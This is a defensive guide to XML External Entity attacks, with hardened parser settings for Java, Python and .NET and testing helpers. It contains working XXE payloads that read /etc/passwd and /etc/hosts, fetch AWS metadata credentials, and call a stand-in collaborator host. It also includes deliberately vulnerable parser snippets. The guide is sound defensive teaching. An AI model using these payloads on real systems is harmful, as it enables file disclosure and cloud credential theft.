XXE Vulnerability: XML External Entity Attacks and Prevention Guide

XXE Usually Hides in the Parts of the Stack Nobody Revisits

Very few teams ship brand-new features and announce, "we built an XML parser today." XXE usually shows up more indirectly than that. It is sitting inside a SAML library, a SOAP integration that has been running for years, an SVG upload flow, or some document-processing code nobody wants to touch because it only breaks twice a year.

That is why XXE keeps surviving into modern systems even though the bug class is well known. The XML is still there. It is just not where people expect it.

XML External Entity (XXE) attacks happen when an XML parser processes Document Type Definitions (DTDs) and resolves the external entities they declare in untrusted input. That lets attackers turn ordinary XML parsing into:

Local file disclosure
Server-Side Request Forgery (SSRF)
Internal network scanning
Denial of service through entity expansion

Even if your application is "mostly JSON," XXE still appears in SAML integrations, SOAP services, file uploads, office document processing, SVG handling, and third-party SDKs.

XXE Impact	Example
File disclosure	Read `/etc/passwd` or app config files
SSRF	Reach cloud metadata endpoints or internal admin panels
Credential exposure	Read keys, tokens, or connection strings from local files
DoS	Exponential entity expansion consumes CPU and memory
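
To make the "exponential" part concrete, here is a rough back-of-the-envelope sketch. It assumes the classic nested-entity shape, where each entity references the previous one a fixed number of times; the function name and parameters are illustrative, not taken from any library.

```python
def expanded_size(levels: int, fanout: int, base_len: int) -> int:
    """Bytes produced when the outermost entity is fully expanded.

    Each level references the level below it `fanout` times, so the
    output grows as base_len * fanout ** levels.
    """
    return base_len * fanout ** levels


# A 3-byte string, nested 9 levels deep, 10 references per level.
print(expanded_size(levels=9, fanout=10, base_len=3))  # 3000000000
```

A document of well under a kilobyte can therefore ask the parser to materialize roughly 3 GB of text, which is why expansion limits or an outright DOCTYPE ban matter.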

Basic XXE Attack Example

Malicious XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>

If the parser resolves external entities, the application may include local file contents in logs, responses, database records, or error messages.

XXE to SSRF: The Cloud Risk

XXE is not limited to files. External entities can make network requests.

Example Payload

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY meta SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&meta;</data>

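This payload targets the AWS EC2 instance metadata service. Against an instance that still allows IMDSv1, it can expose the attached role name and, with one more request, that role's temporary credentials. IMDSv2 blunts this particular payload because it requires a session token obtained through a PUT request, which an entity fetch cannot issue. Other cloud providers expose comparable metadata endpoints.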

Vulnerable Java Example

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream);

DocumentBuilderFactory does not disable DTDs or external entities by default, so this parser will process an attacker-supplied DOCTYPE and resolve the entities it declares.

Hardened Java Configuration

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Rejecting DOCTYPE outright blocks external entities and entity expansion in one step.
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth, in case DOCTYPE support ever has to be re-enabled.
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// Close the remaining inclusion and expansion paths.
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream);

Vulnerable Python Example

from lxml import etree

def parse_xml(xml_bytes: bytes):
    # Relies on the default parser; lxml releases before 5.0 resolve external file entities here.
    return etree.fromstring(xml_bytes)

Hardened Python Example

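from lxml import etree

def parse_xml(xml_bytes: bytes):
    # Set the security flags explicitly instead of relying on parser defaults.
    parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
    return etree.fromstring(xml_bytes, parser=parser)

Use hardened parser libraries where available instead of trying to remember every parser flag by hand. For the standard-library parsers, defusedxml offers drop-in replacements. Its defusedxml.lxml module is deprecated, so lxml is configured explicitly here.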

Vulnerable .NET Example

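// Unsafe on .NET Framework versions before 4.5.2, where XmlDocument resolves external entities by default.
var xml = new XmlDocument();
xml.Load(stream);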

Hardened .NET Example

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};

using var reader = XmlReader.Create(stream, settings);
var xml = new XmlDocument {
    XmlResolver = null
};
xml.Load(reader);

Why XXE Keeps Slipping Through Reviews

1. Developers Assume XML Is Just Data

XML can instruct parsers to fetch external resources. That makes it more dangerous than data-only formats such as JSON, which have no equivalent of a DTD or an entity.
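
One way to see those instructions without acting on them is to ask the parser what a document declares. The sketch below uses Python's standard-library expat binding. The helper name `declared_external_entities` is an illustration, not part of any library, and the sample reuses the payload from earlier in this guide.

```python
import xml.parsers.expat


def declared_external_entities(xml_bytes: bytes) -> list[tuple[str, str]]:
    """Return (entity name, system identifier) pairs declared in the DTD.

    Nothing is fetched: no ExternalEntityRefHandler is installed, so expat
    only reports the declarations and leaves the references unresolved.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External entities carry a system identifier instead of an inline value.
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return found


sample = b"""<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user><name>&xxe;</name></user>"""

print(declared_external_entities(sample))  # [('xxe', 'file:///etc/passwd')]
```

The document itself names the resource it wants read. Whether that read happens depends entirely on how the consuming parser is configured.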

2. The XML Is Hidden Inside Other Formats

Common examples:

SVG uploads
SOAP requests
SAML assertions
DOCX, XLSX, and other zipped XML-based formats

3. Secure Defaults Differ Across Libraries

One parser may disable DTDs by default, while another quietly allows them. Teams often copy examples without checking security flags.

How to Test for XXE

File Read Probe

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<foo>&xxe;</foo>

SSRF Probe

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator.example/xxe">]>
<foo>&xxe;</foo>
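
When several endpoints are probed in one session, it helps to tag each payload so an out-of-band hit can be traced back to the request that caused it. A minimal sketch, assuming you control a callback host (the `collaborator.example` name is the placeholder used above, and `build_ssrf_probe` is a hypothetical helper):

```python
import uuid


def build_ssrf_probe(callback_host: str) -> tuple[str, str]:
    """Return (token, payload) where the token is embedded in the callback URL."""
    token = uuid.uuid4().hex
    payload = (
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://{callback_host}/xxe/{token}">]>\n'
        "<foo>&xxe;</foo>"
    )
    return token, payload


token, payload = build_ssrf_probe("collaborator.example")
print(token)
print(payload)
```

Record the token next to the endpoint under test. A request for that path in the callback host's logs indicates that the endpoint's parser resolved the entity.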

DoS Probe

Use a safe test environment only. Entity expansion payloads can destabilize services quickly.

Best Practices for XXE Prevention

Prefer JSON When Possible

If you control the protocol, JSON has no DTD or entity mechanism, so it removes this entire category of parser risk.

Disable DTDs and External Entities

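This is the primary defense for XML parsers. Reject DOCTYPE declarations outright where you can. Where DTDs are genuinely required, disable external general entities, external parameter entities, and external DTD loading instead.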
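
Where a parser offers no "disallow DOCTYPE" switch, one option is a pre-parse gate. The sketch below uses Python's standard-library expat binding to reject any document containing a DOCTYPE before it reaches the real parser. The `DoctypeForbidden` and `assert_no_doctype` names are assumptions made for this example.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def assert_no_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeForbidden if the document declares a DOCTYPE."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at the start of the DOCTYPE, before any entity is declared.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


assert_no_doctype(b"<user><name>alice</name></user>")  # passes silently
```

The gate costs a second parse of each document. Prefer the parser's own configuration flags when they exist and treat a check like this as a fallback.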

Use Hardened Libraries

Libraries such as defusedxml exist for a reason. Use them.

Restrict Outbound Network Access

If XXE does occur, network egress controls can limit SSRF impact.
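
Real egress control belongs in the network layer (security groups, firewall rules, a proxy). The sketch below only illustrates the kind of rule such a control would encode: loopback, link-local, and private ranges are off limits to a workload that parses untrusted XML. The function name is hypothetical, and it expects an IP address literal, so hostnames need to be resolved first.

```python
import ipaddress


def is_internal_destination(ip_text: str) -> bool:
    """True if the address is loopback, link-local, or private."""
    addr = ipaddress.ip_address(ip_text)
    return addr.is_loopback or addr.is_link_local or addr.is_private


for candidate in ("169.254.169.254", "127.0.0.1", "10.0.0.5", "8.8.8.8"):
    print(candidate, is_internal_destination(candidate))
```

The first three addresses are flagged, including the cloud metadata address used in the SSRF payload earlier. The public address is not.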

Review Indirect XML Inputs

Do not focus only on explicit .xml endpoints. Look at document imports, SSO flows, and image handling.
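
For zipped formats such as DOCX and XLSX, a quick triage step is to look inside the archive for XML parts that carry a DOCTYPE. The sketch below is a heuristic only: it inspects the first 4 KB of each part as raw bytes, so a UTF-16 encoded part or a DOCTYPE pushed further down by long comments would slip past it. The function name is an assumption made for this example.

```python
import io
import zipfile


def xml_parts_with_doctype(archive_bytes: bytes) -> list[str]:
    """Return names of XML members whose leading bytes contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # Read only the head of the part to avoid inflating large members.
            with archive.open(info) as part:
                head = part.read(4096)
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged
```

Legitimate office documents rarely need a DOCTYPE, so any hit is worth a closer look before the file reaches a full document-processing library.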

XXE Hardening Checklist

Disable DTD processing
Disable external general entities
Disable external parameter entities
Disable external DTD loading
Use hardened XML parser libraries
Prefer JSON for new integrations
Restrict outbound network egress from parser workloads
Add tests for malicious XML samples in CI
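
The last checklist item can start small. The sketch below keeps a corpus of the probes from this guide and reports which ones a given parse function accepted without raising. It assumes a strict "reject any DOCTYPE" policy, and `parse` stands in for whatever entry point your application uses. Both names in the block are illustrative.

```python
from typing import Callable

MALICIOUS_SAMPLES = {
    "file_read": b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><foo>&xxe;</foo>',
    "ssrf": b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator.example/xxe">]><foo>&xxe;</foo>',
}


def accepted_samples(parse: Callable[[bytes], object]) -> list[str]:
    """Return the names of malicious samples that `parse` did not reject."""
    accepted = []
    for name, payload in MALICIOUS_SAMPLES.items():
        try:
            parse(payload)
        except Exception:
            continue  # Rejection is the desired outcome.
        accepted.append(name)
    return accepted
```

A CI test would assert that `accepted_samples(your_parse_function)` returns an empty list. Parsers configured to leave entities unresolved rather than reject the document need a different assertion, for example checking that the output never contains file contents.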

Final Takeaway

XXE is not an obscure parser edge case. It is a reminder that input formats can carry behavior, not just structure. The teams that avoid it consistently do two things well: they know exactly where XML still enters the stack, and they lock those code paths down instead of assuming a library default will stay safe forever.